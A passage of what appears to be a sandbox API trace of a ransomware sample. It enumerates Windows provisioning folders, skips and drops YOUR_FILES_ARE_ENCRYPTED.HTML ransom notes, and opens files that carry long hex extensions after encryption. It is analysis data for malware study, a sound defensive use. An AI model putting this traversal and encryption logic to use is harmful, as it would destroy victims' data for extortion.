ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaef341ca, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef57809, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.150] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0fddd6c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0fddd6c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaef37f46, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xda6, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="customizations.xml.3C3777E125AE6A2A4CC36296C2A12E42EE436C89853FC88C99B08DA8CDA2E24E", cAlternateFileName="CUSTOM~1.3C3")) returned 1 [0110.150] StrStrIW (lpFirst="customizations.xml.3C3777E125AE6A2A4CC36296C2A12E42EE436C89853FC88C99B08DA8CDA2E24E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.150] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.3C3777E125AE6A2A4CC36296C2A12E42EE436C89853FC88C99B08DA8CDA2E24E") returned 168 [0110.150] PathFindExtensionW (pszPath="customizations.xml.3C3777E125AE6A2A4CC36296C2A12E42EE436C89853FC88C99B08DA8CDA2E24E") returned=".3C3777E125AE6A2A4CC36296C2A12E42EE436C89853FC88C99B08DA8CDA2E24E" [0110.150] lstrlenW (lpString=".3C3777E125AE6A2A4CC36296C2A12E42EE436C89853FC88C99B08DA8CDA2E24E") returned 65 [0110.150] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0f1f13f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0f1f13f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0f1f13f, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0110.150] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.150] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml") returned 104 [0110.150] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.150] lstrlenW (lpString=".xml") returned 4 [0110.150] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.150] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.150] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=271) returned 1 [0110.150] CloseHandle (hObject=0x30c) returned 1 [0110.150] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Prov", cAlternateFileName="")) returned 1 [0110.150] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.150] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov") returned 89 [0110.150] GetProcessHeap () returned 0x600000 [0110.150] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.151] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov" [0110.151] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*" [0110.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaef502e2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.152] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaef502e2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.152] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime", cAlternateFileName="")) returned 1 [0110.152] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.152] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime") returned 97 [0110.152] GetProcessHeap () returned 0x600000 [0110.152] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.153] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime" [0110.153] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*" [0110.153] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaef479f5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f485c, dwReserved1=0x6f47a8, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.153] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaef479f5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f485c, dwReserved1=0x6f47a8, cFileName="..", cAlternateFileName="")) returned 1 [0110.153] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0eac9f1, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0eac9f1, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0eac9f1, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x734, dwReserved0=0x6f485c, dwReserved1=0x6f47a8, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0110.153] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.153] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml") returned 113 [0110.153] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.153] lstrlenW (lpString=".provxml") returned 8 [0110.153] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.153] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ed2c64, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ed2c64, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0ef8ed0, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x732, dwReserved0=0x6f485c, dwReserved1=0x6f47a8, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0110.153] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.153] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml") returned 113 [0110.153] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.153] lstrlenW (lpString=".provxml") returned 8 [0110.153] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.153] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef45453, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaef45453, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef4b4c0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f485c, dwReserved1=0x6f47a8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.153] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef45453, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaef45453, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef4b4c0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f485c, dwReserved1=0x6f47a8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.153] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.153] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0110.154] GetProcessHeap () returned 0x600000 [0110.154] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.154] GetProcessHeap () returned 0x600000 [0110.154] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.154] GetProcessHeap () returned 0x600000 [0110.154] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.154] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ed2c64, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ed2c64, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0ef8ed0, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x139, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0110.155] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.155] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml") returned 101 [0110.155] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.155] lstrlenW (lpString=".xml") returned 4 [0110.155] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.155] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.155] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0110.155] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=313) returned 1 [0110.155] CloseHandle (hObject=0x32c) returned 1 [0110.155] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef502e2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaef502e2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef53e02, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.155] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef502e2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaef502e2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef53e02, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.155] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.155] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0110.155] GetProcessHeap () returned 0x600000 [0110.155] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.156] GetProcessHeap () returned 0x600000 [0110.156] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.156] GetProcessHeap () returned 0x600000 [0110.156] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.157] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef57809, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaef57809, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef5b28e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.157] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef57809, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaef57809, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef5b28e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.157] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.157] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0110.157] GetProcessHeap () returned 0x600000 [0110.157] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.158] GetProcessHeap () returned 0x600000 [0110.158] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.158] GetProcessHeap () returned 0x600000 [0110.158] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.158] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaef85deb, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef85deb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", cAlternateFileName="{FC01E~1")) returned 1 [0110.158] StrStrIW (lpFirst="{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.158] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}") returned 84 [0110.158] GetProcessHeap () returned 0x600000 [0110.158] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.159] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}" [0110.159] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*" [0110.159] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaef85deb, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefb6b20, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.159] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaef85deb, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefb6b20, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.159] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9d106f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xaa9d106f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaef8abfd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x6eb8, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="customizations.xml.E817B911CF4E9B462C2F3AA22DC733F3E56499826724160357A4EAEFC4CA3535", cAlternateFileName="CUSTOM~1.E81")) returned 1 [0110.159] StrStrIW (lpFirst="customizations.xml.E817B911CF4E9B462C2F3AA22DC733F3E56499826724160357A4EAEFC4CA3535", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.159] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 